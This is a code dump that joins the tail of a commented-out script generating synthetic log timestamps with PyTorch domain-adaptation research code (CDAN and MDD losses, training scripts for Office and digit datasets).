# while(count < 100):
# # irregular_cnt = int(60*24/period*irregular_rate)
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
# # for i in range(irregular_cnt):
# # d = random.randint(0,1)
# # if d == 0:
# # d = -1
# # irregular_time = random.randint(0,len(time_sec)-1)
# # time_sec[irregular_time] += d*random.randint(1,3)
#
# all_cnt = 24*60/period
# noize_cnt = all_cnt / (1 - noize) * noize
#
# for _ in range(int(noize_cnt)):
# time_sec.append(random.randint(0,24*60*60-1))
# sorted(time_sec)
# msg = 'Period: {0} min ({1} sec) period with {2} % noize'.format(period,period*60,noize*100)
# insert_db(ind,msg,time_sec)
# ind += 1
# count += 1
#
# while(ind<(7*3)):
# #周期(3-70min),irregular point(全体の20%以下、+-5秒),3/1hのノイズ
# for period in [3,5,7,10,15,30,60]:
# irregular_cnt = random.randint(1,int(60*24/period/5))
# time_sec = [x * 60 * period for x in range(1, int( 60*60*24 / (60*period) ) ) ]
#
# for i in range(24):
# for j in range(3):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
#
# for i in range(irregular_cnt):
# d = [-1,1][random.randint(0,1)]
# time_sec[random.randint(0,len(time_sec)-1)] += d*random.randint(1,5)
#
# msg = 'Period: {0} min ({4} sec) period with {1} irregular point ( {1} / {2} = {3} % ) with 1/h noizes'.format(period,irregular_cnt,60*24/period,round(irregular_cnt/(60*24/period)*100,1),period*60)
# # msg = 'Period: {0} min ({1} sec) with 5 / 1h random noizes'.format(period,period*60)
# insert_db(ind,msg,time_sec)
# ind += 1
# #random log 3min or 5min
# while(ind<50):
# interval = [3,5,5,5,5,5,2]
# time_sec = [0]
# cur = 0
# while( cur < (60*60*24 - 60*5) ):
# cur += interval[random.randint(0,6)]*60
# time_sec.append(cur)
# msg = 'Random: 3min or 5min interval'
# insert_db(ind,msg,time_sec)
# ind += 1
# #random log
# random_rates = [1,3,10,100,1000]
# for random_rate in random_rates:
# while(True):
# time_sec = []
# for i in range(24):
# for _ in range(random_rate):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
# msg = 'Random: random log {0} cnt/min'.format(random_rate)
# insert_db(ind,msg,time_sec)
# ind += 1
# if (ind-1)%10 == 0:
# break
# msg = 'Period: 3min 3min 5min repeat'
# period = [3,6,11]
# time_sec = [ x * 60 * 11 + period[y%3]*60 for x in range( int(60*24 / 11) * 3 ) for y in range(3) if x * 60 * 11 < 86400 - 11 * 60]
# insert_db(ind,msg,time_sec)
# ind += 1
# #周期(30min),irregular point(全体の20%以下、+-3秒),間に5分間隔を忍ばせる
# while(ind < 10):
# period = random.randint(30,30)
# irregular_cnt = random.randint(1,int(60*24/period/5))
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
#
# for i in range(irregular_cnt):
# d = random.randint(0,1)
# if d == 0:
# d = -1
# irregular_time = random.randint(0,len(time_sec)-1)
# time_sec[irregular_time] += d*random.randint(1,3)
#
# for _ in range(8):
# i = random.randint(0,23)
# j = random.randint(30,60*60-900)
# time_sec.append(i*60*60 + j)
# time_sec.append(i*60*60 + j + 180 * 1)
# time_sec.append(i*60*60 + j + 180 * 2)
# time_sec.append(i*60*60 + j + 180 * 3)
# time_sec.append(i*60*60 + j + 180 * 4)
# time_sec.append(i*60*60 + j + 180 * 5)
#
#
# msg = 'Period: {0} min ({4} sec) period with {1} irregular point ( {1} / {2} = {3} %)'.format(period,irregular_cnt,60*24/period,round(irregular_cnt/(60*24/period)*100,1),period*60)
# time_sec = sorted(time_sec)
# insert_db(ind,msg,time_sec)
# ind += 1
exit()
#予備datファイル生成
outputname = sys.argv[1].split('.')[0]+'.dat'
fd = open(outputname,"w")
for k in range(1,ft[-1][0]+1):
fd.write('group {0}\n'.format(k))
for log in group_log_list[k]:
fd.write(log)
fd.write('\n')
fd.close()
|
[
"/__init__.py",
"/burst_burst_search.py",
"/burst_detect.py",
"/burst_detect_all.py",
"/burst_notburst_search.py",
"/burst_pandas.py",
"/co_edge_plot.py",
"/create_edge_db.py",
"/create_lt_db.py",
"/dtw.py",
"/edge_coburst.py",
"/event_agg.py",
"/fft.py",
"/fullevent2event.py",
"/get_log_info.py",
"/get_logtype.py",
"/heat_map.py",
"/host_pandas.py",
"/host_plot_day.py",
"/ipython_imports.py",
"/linear.py",
"/plot.py",
"/plot_day.py",
"/query.py",
"/search_burst.py",
"/search_host_burst.py",
"/search_synmetory.py",
"/show_start_end_date.py",
"/test_db_create.py"
] |
02Bigboy/ATM
|
import numpy as np
import torch
import torch.nn as nn
def Entropy(input_):
epsilon = 1e-5
entropy = -input_ * torch.log(input_ + epsilon)
entropy = torch.sum(entropy, dim=1)
return entropy
def grl_hook(coeff):
def fun1(grad):
return -coeff * grad.clone()
return fun1
def CDAN(input_list, ad_net, entropy=None, coeff=None, random_layer=None):
softmax_output = input_list[1].detach()
feature = input_list[0]
if random_layer is None:
op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
else:
random_out = random_layer.forward([feature, softmax_output])
ad_out = ad_net(random_out.view(-1, random_out.size(1)))
batch_size = softmax_output.size(0) // 2
dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
if entropy is not None:
entropy.register_hook(grl_hook(coeff))
entropy = 1.0 + torch.exp(-entropy)
source_mask = torch.ones_like(entropy)
source_mask[feature.size(0) // 2:] = 0
source_weight = entropy * source_mask
target_mask = torch.ones_like(entropy)
target_mask[0:feature.size(0) // 2] = 0
target_weight = entropy * target_mask
weight = source_weight / torch.sum(source_weight).detach().item() + \
target_weight / torch.sum(target_weight).detach().item()
l = nn.BCELoss(reduction='none')(ad_out, dc_target)
return torch.sum(weight.view(-1, 1) * nn.BCELoss()(ad_out, dc_target)) / torch.sum(weight).detach().item()
else:
return nn.BCELoss()(ad_out, dc_target)
def mdd_loss(features, labels, left_weight=1, right_weight=1):
softmax_out = nn.Softmax(dim=1)(features)
batch_size = features.size(0)
if float(batch_size) % 2 != 0:
raise Exception('Incorrect batch size provided')
batch_left = softmax_out[:int(0.5 * batch_size)]
batch_right = softmax_out[int(0.5 * batch_size):]
loss = torch.norm((batch_left - batch_right).abs(), 2, 1).sum() / float(batch_size)
labels_left = labels[:int(0.5 * batch_size)]
batch_left_loss = get_pari_loss1(labels_left, batch_left)
labels_right = labels[int(0.5 * batch_size):]
batch_right_loss = get_pari_loss1(labels_right, batch_right)
return loss + left_weight * batch_left_loss + right_weight * batch_right_loss
def mdd_digit(features, labels, left_weight=1, right_weight=1, weight=1):
softmax_out = nn.Softmax(dim=1)(features)
batch_size = features.size(0)
if float(batch_size) % 2 != 0:
raise Exception('Incorrect batch size provided')
batch_left = softmax_out[:int(0.5 * batch_size)]
batch_right = softmax_out[int(0.5 * batch_size):]
loss = torch.norm((batch_left - batch_right).abs(), 2, 1).sum() / float(batch_size)
labels_left = labels[:int(0.5 * batch_size)]
labels_left_left = labels_left[:int(0.25 * batch_size)]
labels_left_right = labels_left[int(0.25 * batch_size):]
batch_left_left = batch_left[:int(0.25 * batch_size)]
batch_left_right = batch_left[int(0.25 * batch_size):]
batch_left_loss = get_pair_loss(labels_left_left, labels_left_right, batch_left_left, batch_left_right)
labels_right = labels[int(0.5 * batch_size):]
labels_right_left = labels_right[:int(0.25 * batch_size)]
labels_right_right = labels_right[int(0.25 * batch_size):]
batch_right_left = batch_right[:int(0.25 * batch_size)]
batch_right_right = batch_right[int(0.25 * batch_size):]
batch_right_loss = get_pair_loss(labels_right_left, labels_right_right, batch_right_left, batch_right_right)
return weight*loss + left_weight * batch_left_loss + right_weight * batch_right_loss
def get_pair_loss(labels_left, labels_right, features_left, features_right):
loss = 0
for i in range(len(labels_left)):
if (labels_left[i] == labels_right[i]):
loss += torch.norm((features_left[i] - features_right[i]).abs(), 2, 0).sum()
return loss
def get_pari_loss1(labels, features):
loss = 0
count = 0
for i in range(len(labels)):
for j in range(i + 1, len(labels)):
if (labels[i] == labels[j]):
count += 1
loss += torch.norm((features[i] - features[j]).abs(), 2, 0).sum()
return loss / count
def EntropicConfusion(features):
softmax_out = nn.Softmax(dim=1)(features)
batch_size = features.size(0)
loss = torch.mul(softmax_out, torch.log(softmax_out)).sum() * (1.0 / batch_size)
return loss
--- FILE SEPARATOR ---
import argparse
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
import network
import loss
import pre_process as prep
from torch.utils.data import DataLoader
import lr_schedule
from data_list import ImageList
import datetime
def image_classification_test(loader, model, test_10crop=True):
start_test = True
with torch.no_grad():
if test_10crop:
iter_test = [iter(loader['test'][i]) for i in range(10)]
for i in range(len(loader['test'][0])):
data = [iter_test[j].next() for j in range(10)]
inputs = [data[j][0] for j in range(10)]
labels = data[0][1]
for j in range(10):
inputs[j] = inputs[j].cuda()
labels = labels
outputs = []
for j in range(10):
_, predict_out = model(inputs[j])
outputs.append(nn.Softmax(dim=1)(predict_out))
outputs = sum(outputs)
if start_test:
all_output = outputs.float().cpu()
all_label = labels.float()
start_test = False
else:
all_output = torch.cat((all_output, outputs.float().cpu()), 0)
all_label = torch.cat((all_label, labels.float()), 0)
else:
iter_test = iter(loader["test"])
for i in range(len(loader['test'])):
data = iter_test.next()
inputs = data[0]
labels = data[1]
inputs = inputs.cuda()
labels = labels.cuda()
_, outputs = model(inputs)
if start_test:
all_output = outputs.float().cpu()
all_label = labels.float()
start_test = False
else:
all_output = torch.cat((all_output, outputs.float().cpu()), 0)
all_label = torch.cat((all_label, labels.float()), 0)
_, predict = torch.max(all_output, 1)
accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])
return accuracy
def train(config):
## set pre-process
prep_dict = {}
prep_config = config["prep"]
prep_dict["source"] = prep.image_train(**config["prep"]['params'])
prep_dict["target"] = prep.image_train(**config["prep"]['params'])
if prep_config["test_10crop"]:
prep_dict["test"] = prep.image_test_10crop(**config["prep"]['params'])
else:
prep_dict["test"] = prep.image_test(**config["prep"]['params'])
## prepare data
dsets = {}
dset_loaders = {}
data_config = config["data"]
train_bs = data_config["source"]["batch_size"]
test_bs = data_config["test"]["batch_size"]
dsets["source"] = ImageList(open(data_config["source"]["list_path"]).readlines(), \
transform=prep_dict["source"])
dset_loaders["source"] = DataLoader(dsets["source"], batch_size=train_bs, \
shuffle=True, num_workers=0, drop_last=True)
dsets["target"] = ImageList(open(data_config["target"]["list_path"]).readlines(), \
transform=prep_dict["target"])
dset_loaders["target"] = DataLoader(dsets["target"], batch_size=train_bs, \
shuffle=True, num_workers=0, drop_last=True)
if prep_config["test_10crop"]:
for i in range(10):
dsets["test"] = [ImageList(open(data_config["test"]["list_path"]).readlines(), \
transform=prep_dict["test"][i]) for i in range(10)]
dset_loaders["test"] = [DataLoader(dset, batch_size=test_bs, \
shuffle=False, num_workers=0) for dset in dsets['test']]
else:
dsets["test"] = ImageList(open(data_config["test"]["list_path"]).readlines(), \
transform=prep_dict["test"])
dset_loaders["test"] = DataLoader(dsets["test"], batch_size=test_bs, \
shuffle=False, num_workers=0)
class_num = config["network"]["params"]["class_num"]
## set base network
net_config = config["network"]
base_network = net_config["name"](**net_config["params"])
base_network = base_network.cuda()
## add additional network for some methods
if config["loss"]["random"]:
random_layer = network.RandomLayer([base_network.output_num(), class_num], config["loss"]["random_dim"])
ad_net = network.AdversarialNetwork(config["loss"]["random_dim"], 1024)
else:
random_layer = None
ad_net = network.AdversarialNetwork(base_network.output_num() * class_num, 1024)
if config["loss"]["random"]:
random_layer.cuda()
ad_net = ad_net.cuda()
parameter_list = base_network.get_parameters() + ad_net.get_parameters()
## set optimizer
optimizer_config = config["optimizer"]
optimizer = optimizer_config["type"](parameter_list, \
**(optimizer_config["optim_params"]))
param_lr = []
for param_group in optimizer.param_groups:
param_lr.append(param_group["lr"])
schedule_param = optimizer_config["lr_param"]
lr_scheduler = lr_schedule.schedule_dict[optimizer_config["lr_type"]]
gpus = config['gpu'].split(',')
if len(gpus) > 1:
ad_net = nn.DataParallel(ad_net, device_ids=[int(i) for i in gpus])
base_network = nn.DataParallel(base_network, device_ids=[int(i) for i in gpus])
## train
len_train_source = len(dset_loaders["source"])
len_train_target = len(dset_loaders["target"])
best_acc = 0.0
best_model = nn.Sequential(base_network)
each_log = ""
for i in range(config["num_iterations"]):
if i % config["test_interval"] == config["test_interval"] - 1:
base_network.train(False)
temp_acc = image_classification_test(dset_loaders, \
base_network, test_10crop=prep_config["test_10crop"])
temp_model = nn.Sequential(base_network)
if temp_acc > best_acc:
best_acc = temp_acc
best_model = temp_model
log_str = "iter: {:05d}, precision: {:.5f}, transfer_loss:{:.4f}, classifier_loss:{:.4f}, total_loss:{:.4f}" \
.format(i, temp_acc, transfer_loss.item(), classifier_loss.item(), total_loss.item())
config["out_file"].write(log_str + "\n")
config["out_file"].flush()
print(log_str)
config["out_file"].write(each_log)
config["out_file"].flush()
each_log = ""
loss_params = config["loss"]
## train one iter
base_network.train(True)
ad_net.train(True)
optimizer = lr_scheduler(optimizer, i, **schedule_param)
optimizer.zero_grad()
if i % len_train_source == 0:
iter_source = iter(dset_loaders["source"])
if i % len_train_target == 0:
iter_target = iter(dset_loaders["target"])
inputs_source, labels_source = iter_source.next()
inputs_target, labels_target = iter_target.next()
inputs_source, inputs_target, labels_source = inputs_source.cuda(), inputs_target.cuda(), labels_source.cuda()
features_source, outputs_source = base_network(inputs_source)
features_target, outputs_target = base_network(inputs_target)
features = torch.cat((features_source, features_target), dim=0)
outputs = torch.cat((outputs_source, outputs_target), dim=0)
softmax_out = nn.Softmax(dim=1)(outputs)
labels_target_fake = torch.max(nn.Softmax(dim=1)(outputs_target), 1)[1]
labels = torch.cat((labels_source, labels_target_fake))
entropy = loss.Entropy(softmax_out)
transfer_loss = loss.CDAN([features, softmax_out], ad_net, entropy, network.calc_coeff(i), random_layer)
classifier_loss = nn.CrossEntropyLoss()(outputs_source,
labels_source)
mdd_loss = loss.mdd_loss(
features=features, labels=labels, left_weight=args.left_weight, right_weight=args.right_weight)
max_entropy_loss = loss.EntropicConfusion(features)
total_loss = loss_params["trade_off"] * transfer_loss \
+ args.cls_weight * classifier_loss \
+ args.mdd_weight * mdd_loss \
+ args.entropic_weight * max_entropy_loss
total_loss.backward()
optimizer.step()
log_str = "iter: {:05d},transfer_loss:{:.4f}, classifier_loss:{:.4f}, mdd_loss:{:4f}," \
"max_entropy_loss:{:.4f},total_loss:{:.4f}" \
.format(i, transfer_loss.item(), classifier_loss.item(), mdd_loss.item(),
max_entropy_loss.item(), total_loss.item())
each_log += log_str + "\n"
torch.save(best_model, config['model_output_path'] + "{}_{}_p-{}_e-{}".
format(config['log_name'], str(best_acc), str(config["mdd_weight"]),
str(config["entropic_weight"])))
return best_acc
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help="device id to run")
parser.add_argument('--net', type=str, default='ResNet50',
choices=["ResNet18", "ResNet34", "ResNet50", "ResNet101", "ResNet152", "VGG11", "VGG13",
"VGG16", "VGG19", "VGG11BN", "VGG13BN", "VGG16BN", "VGG19BN", "AlexNet"])
parser.add_argument('--dset', type=str, default='office', choices=['office', 'image-clef', 'visda', 'office-home'],
help="The dataset or source dataset used")
parser.add_argument('--s_dset_path', type=str, default='data/office/amazon_list.txt',
help="The source dataset path list")
parser.add_argument('--t_dset_path', type=str, default='data/office/webcam_list.txt',
help="The target dataset path list")
parser.add_argument('--test_interval', type=int, default=500, help="interval of two continuous test phase")
parser.add_argument('--snapshot_interval', type=int, default=5000, help="interval of two continuous output model")
parser.add_argument('--output_dir', type=str, default='san_office',
help="output directory of our model (in ../snapshot directory)")
parser.add_argument('--lr', type=float, default=0.1, help="learning rate")
parser.add_argument('--random', type=bool, default=False, help="whether use random projection")
parser.add_argument("--mdd_weight", type=float, default=0)
parser.add_argument("--entropic_weight", type=float, default=0)
parser.add_argument("--log_name", type=str, default="a2w")
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument("--use_seed", type=bool, default=False)
parser.add_argument("--torch_seed", type=int, default=1)
parser.add_argument("--torch_cuda_seed", type=int, default=1)
parser.add_argument("--left_weight", type=float, default=1)
parser.add_argument("--right_weight", type=float, default=1)
parser.add_argument("--cls_weight", type=float, default=1)
parser.add_argument("--epoch", type=int, default=40000)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
if (args.use_seed):
torch.manual_seed(args.torch_seed)
torch.cuda.manual_seed(args.torch_cuda_seed)
torch.cuda.manual_seed_all(args.torch_cuda_seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
config = {}
config["left_weight"] = args.left_weight
config["right_weight"] = args.right_weight
config['torch_seed'] = torch.initial_seed()
config['torch_cuda_seed'] = torch.cuda.initial_seed()
config["mdd_weight"] = args.mdd_weight
config["entropic_weight"] = args.entropic_weight
config["gpu"] = args.gpu_id
config["num_iterations"] = args.epoch
config["test_interval"] = args.test_interval
config["snapshot_interval"] = args.snapshot_interval
config["output_for_test"] = True
config["log_output_path"] = "snapshot/" + args.output_dir + "/" + args.log_name + "/log/"
config["model_output_path"] = "snapshot/" + args.output_dir + "/" + args.log_name + "/model/"
config['log_name'] = args.log_name
if not osp.exists(config["log_output_path"]):
os.system('mkdir -p ' + config["log_output_path"])
config["out_file"] = open(
osp.join(config["log_output_path"], args.log_name + "_{}.txt".format(str(datetime.datetime.utcnow()))), "w")
if not osp.exists(config["log_output_path"]):
os.mkdir(config["log_output_path"])
if not osp.exists(config["model_output_path"]):
os.mkdir(config["model_output_path"])
config["prep"] = {"test_10crop": True, 'params': {"resize_size": 256, "crop_size": 224, 'alexnet': False}}
config["loss"] = {"trade_off": 1.0}
if "AlexNet" in args.net:
config["prep"]['params']['alexnet'] = True
config["prep"]['params']['crop_size'] = 227
config["network"] = {"name": network.AlexNetFc, \
"params": {"use_bottleneck": True, "bottleneck_dim": 256, "new_cls": True}}
elif "ResNet" in args.net:
config["network"] = {"name": network.ResNetFc, \
"params": {"resnet_name": args.net, "use_bottleneck": True, "bottleneck_dim": 256,
"new_cls": True}}
elif "VGG" in args.net:
config["network"] = {"name": network.VGGFc, \
"params": {"vgg_name": args.net, "use_bottleneck": True, "bottleneck_dim": 256,
"new_cls": True}}
config["loss"]["random"] = args.random
config["loss"]["random_dim"] = 1024
config["optimizer"] = {"type": optim.SGD, "optim_params": {'lr': args.lr, "momentum": 0.9, \
"weight_decay": 0.0005, "nesterov": True},
"lr_type": "inv", \
"lr_param": {"lr": args.lr, "gamma": 0.001, "power": 0.75}}
config["dataset"] = args.dset
config["data"] = {"source": {"list_path": args.s_dset_path, "batch_size": 36}, \
"target": {"list_path": args.t_dset_path, "batch_size": 36}, \
"test": {"list_path": args.t_dset_path, "batch_size": 4}}
if config["dataset"] == "office":
if ("amazon" in args.s_dset_path and "webcam" in args.t_dset_path) or \
("webcam" in args.s_dset_path and "dslr" in args.t_dset_path) or \
("webcam" in args.s_dset_path and "amazon" in args.t_dset_path) or \
("dslr" in args.s_dset_path and "amazon" in args.t_dset_path):
config["optimizer"]["lr_param"]["lr"] = 0.001 # optimal parameters 0.001 default
elif ("amazon" in args.s_dset_path and "dslr" in args.t_dset_path) or \
("dslr" in args.s_dset_path and "webcam" in args.t_dset_path):
config["optimizer"]["lr_param"]["lr"] = 0.0003 # optimal parameters 0.0003 default
config["network"]["params"]["class_num"] = 31
elif config["dataset"] == "image-clef":
config["optimizer"]["lr_param"]["lr"] = 0.001 # optimal parameters
config["network"]["params"]["class_num"] = 12
elif config["dataset"] == "visda":
config["optimizer"]["lr_param"]["lr"] = 0.001 # optimal parameters
config["network"]["params"]["class_num"] = 12
config['loss']["trade_off"] = 1.0
elif config["dataset"] == "office-home":
config["optimizer"]["lr_param"]["lr"] = 0.001 # optimal parameters
config["network"]["params"]["class_num"] = 65
else:
raise ValueError('Dataset cannot be recognized. Please define your own dataset here.')
config["out_file"].write(str(config) + "\n")
config["out_file"].flush()
train(config)
--- FILE SEPARATOR ---
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision import transforms
from data_list import ImageList
import os
import loss as loss_func
import numpy as np
import network
def train(args, config, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch):
model.train()
len_source = len(train_loader)
len_target = len(train_loader1)
if len_source > len_target:
num_iter = len_source
else:
num_iter = len_target
total_loss = 0
for batch_idx in range(num_iter):
if batch_idx % len_source == 0:
iter_source = iter(train_loader)
if batch_idx % len_target == 0:
iter_target = iter(train_loader1)
data_source, label_source = iter_source.next()
data_source, label_source = data_source.cuda(), label_source.cuda()
data_target, label_target = iter_target.next()
data_target = data_target.cuda()
optimizer.zero_grad()
optimizer_ad.zero_grad()
feature_source, output_source = model(data_source)
feature_target, output_target = model(data_target)
feature = torch.cat((feature_source, feature_target), 0)
output = torch.cat((output_source, output_target), 0)
labels_target_fake = torch.max(nn.Softmax(dim=1)(output_target), 1)[1]
labels = torch.cat((label_source, labels_target_fake))
loss = nn.CrossEntropyLoss()(output.narrow(0, 0, data_source.size(0)), label_source)
softmax_output = nn.Softmax(dim=1)(output)
if epoch > 0:
entropy = loss_func.Entropy(softmax_output)
loss += loss_func.CDAN([feature, softmax_output], ad_net, entropy,
network.calc_coeff(num_iter * (epoch - 0) + batch_idx), random_layer)
mdd_loss = args.mdd_weight * loss_func.mdd_digit(feature, labels, args.left_weight,args.right_weight, args.weight)
loss = loss + mdd_loss
total_loss += loss.data
loss.backward()
optimizer.step()
if epoch > 0:
optimizer_ad.step()
if (batch_idx + epoch * num_iter) % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * args.batch_size, num_iter * args.batch_size,
100. * batch_idx / num_iter, loss.item()))
log_str = "total_loss:{}\n".format(total_loss)
config["out_file"].write(log_str)
config["out_file"].flush()
print(log_str)
def test(epoch, config, model, test_loader):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
feature, output = model(data)
test_loss += nn.CrossEntropyLoss()(output, target).item()
pred = output.data.cpu().max(1, keepdim=True)[1]
correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
acc = 100. * correct / len(test_loader.dataset)
log_str = 'epoch:{},Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(epoch,
test_loss, correct,
len(test_loader.dataset),
acc)
config["out_file"].write(log_str)
config["out_file"].flush()
print(log_str)
return acc
def main():
parser = argparse.ArgumentParser(description='CDAN SVHN MNIST')
parser.add_argument('--method', type=str, default='CDAN-E', choices=['CDAN', 'CDAN-E', 'DANN'])
parser.add_argument('--task', default='USPS2MNIST', help='task to perform')
parser.add_argument('--batch_size', type=int, default=256,
help='input batch size for training (default: 64)')
parser.add_argument('--test_batch_size', type=int, default=1000,
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.03, metavar='LR')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--gpu_id', default='0', type=str,
help='cuda device id')
parser.add_argument('--seed', type=int, default=40, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log_interval', type=int, default=10,
help='how many batches to wait before logging training status')
parser.add_argument('--random', type=bool, default=False,
help='whether to use random')
parser.add_argument("--mdd_weight", type=float, default=0)
parser.add_argument("--entropic_weight", type=float, default=0)
parser.add_argument("--weight", type=float, default=1)
parser.add_argument("--left_weight", type=float, default=1)
parser.add_argument("--right_weight", type=float, default=1)
parser.add_argument('--use_seed', type=int, default=1)
args = parser.parse_args()
if args.use_seed:
import random
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
random.seed(args.seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
import os.path as osp
import time
config = {}
config["use_seed"] = args.use_seed
config['seed'] = args.seed
config["output_path"] = "snapshot/s2m"
config["mdd_weight"] = args.mdd_weight
config["entropic_weight"] = args.entropic_weight
config["weight"] = args.weight
config["left_weight"] = args.left_weight
config["right_weight"] = args.right_weight
if not osp.exists(config["output_path"]):
os.system('mkdir -p ' + config["output_path"])
config["out_file"] = open(osp.join(config["output_path"], "log_svhn_to_mnist_{}______{}.txt".
format(str(int(time.time())), str(args.seed))),
"w")
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
source_list = 'data/svhn2mnist/svhn_balanced.txt'
target_list = 'data/svhn2mnist/mnist_train.txt'
test_list = 'data/svhn2mnist/mnist_test.txt'
train_loader = torch.utils.data.DataLoader(
ImageList(open(source_list).readlines(), transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='RGB'),
batch_size=args.batch_size, shuffle=True, num_workers=0)
train_loader1 = torch.utils.data.DataLoader(
ImageList(open(target_list).readlines(), transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='RGB'),
batch_size=args.batch_size, shuffle=True, num_workers=0)
test_loader = torch.utils.data.DataLoader(
ImageList(open(test_list).readlines(), transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='RGB'),
batch_size=args.test_batch_size, shuffle=True, num_workers=0)
model = network.DTN()
model = model.cuda()
class_num = 10
if args.random:
random_layer = network.RandomLayer([model.output_num(), class_num], 500)
ad_net = network.AdversarialNetwork(500, 500)
random_layer.cuda()
else:
random_layer = None
ad_net = network.AdversarialNetwork(model.output_num() * class_num, 500)
ad_net = ad_net.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
optimizer_ad = optim.SGD(ad_net.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
config["out_file"].write(str(config))
config["out_file"].flush()
best_model = model
best_acc = 0
for epoch in range(1, args.epochs + 1):
if epoch % 3 == 0:
for param_group in optimizer.param_groups:
param_group["lr"] = param_group["lr"] * 0.3
train(args, config, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch)
acc = test(epoch, config, model, test_loader)
if (acc > best_acc):
best_model = model
best_acc = acc
torch.save(best_model, osp.join("snapshot/s2m_model", "s2m_{}_{}".format(str(best_acc), str(args.mdd_weight))))
if __name__ == '__main__':
main()
--- FILE SEPARATOR ---
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from data_list import ImageList
import os
from torch.autograd import Variable
import loss as loss_func
import numpy as np
import network
def train(args, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch, start_epoch,
method):
model.train()
len_source = len(train_loader)
len_target = len(train_loader1)
if len_source > len_target:
num_iter = len_source
else:
num_iter = len_target
for batch_idx in range(num_iter):
if batch_idx % len_source == 0:
iter_source = iter(train_loader)
if batch_idx % len_target == 0:
iter_target = iter(train_loader1)
data_source, label_source = iter_source.next()
data_source, label_source = data_source.cuda(), label_source.cuda()
data_target, label_target = iter_target.next()
data_target = data_target.cuda()
optimizer.zero_grad()
optimizer_ad.zero_grad()
feature_source, output_source = model(data_source)
feature_target, output_target = model(data_target)
feature = torch.cat((feature_source, feature_target), 0)
output = torch.cat((output_source, output_target), 0)
labels_target_fake = torch.max(nn.Softmax(dim=1)(output_target), 1)[1]
labels = torch.cat((label_source, labels_target_fake))
loss = nn.CrossEntropyLoss()(output.narrow(0, 0, data_source.size(0)), label_source)
softmax_output = nn.Softmax(dim=1)(output)
if epoch > start_epoch:
entropy = loss_func.Entropy(softmax_output)
loss += loss_func.CDAN([feature, softmax_output], ad_net, entropy,
network.calc_coeff(num_iter * (epoch - start_epoch) + batch_idx), random_layer)
loss = loss + args.mdd_weight * loss_func.mdd_digit(
feature, labels) + args.entropic_weight * loss_func.EntropicConfusion(feature)
loss.backward()
optimizer.step()
if epoch > start_epoch:
optimizer_ad.step()
if (batch_idx + epoch * num_iter) % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.4f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * args.batch_size, num_iter * args.batch_size,
100. * batch_idx / num_iter, loss.item()))
def test(args, epoch, config, model, test_loader):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
feature, output = model(data)
test_loss += nn.CrossEntropyLoss()(output, target).item()
pred = output.data.cpu().max(1, keepdim=True)[1]
correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
log_str = 'epoch:{} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(epoch,
test_loss, correct,
len(test_loader.dataset),
100. * correct / len(
test_loader.dataset))
config["out_file"].write(log_str)
config["out_file"].flush()
print(log_str)
def main():
# Training settings
parser = argparse.ArgumentParser(description='CDAN USPS MNIST')
parser.add_argument('--method', type=str, default='CDAN-E', choices=['CDAN', 'CDAN-E', 'DANN'])
parser.add_argument('--task', default='MNIST2USPS', help='MNIST2USPS or MNIST2USPS')
parser.add_argument('--batch_size', type=int, default=64,
help='input batch size for training (default: 64)')
parser.add_argument('--test_batch_size', type=int, default=1000,
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
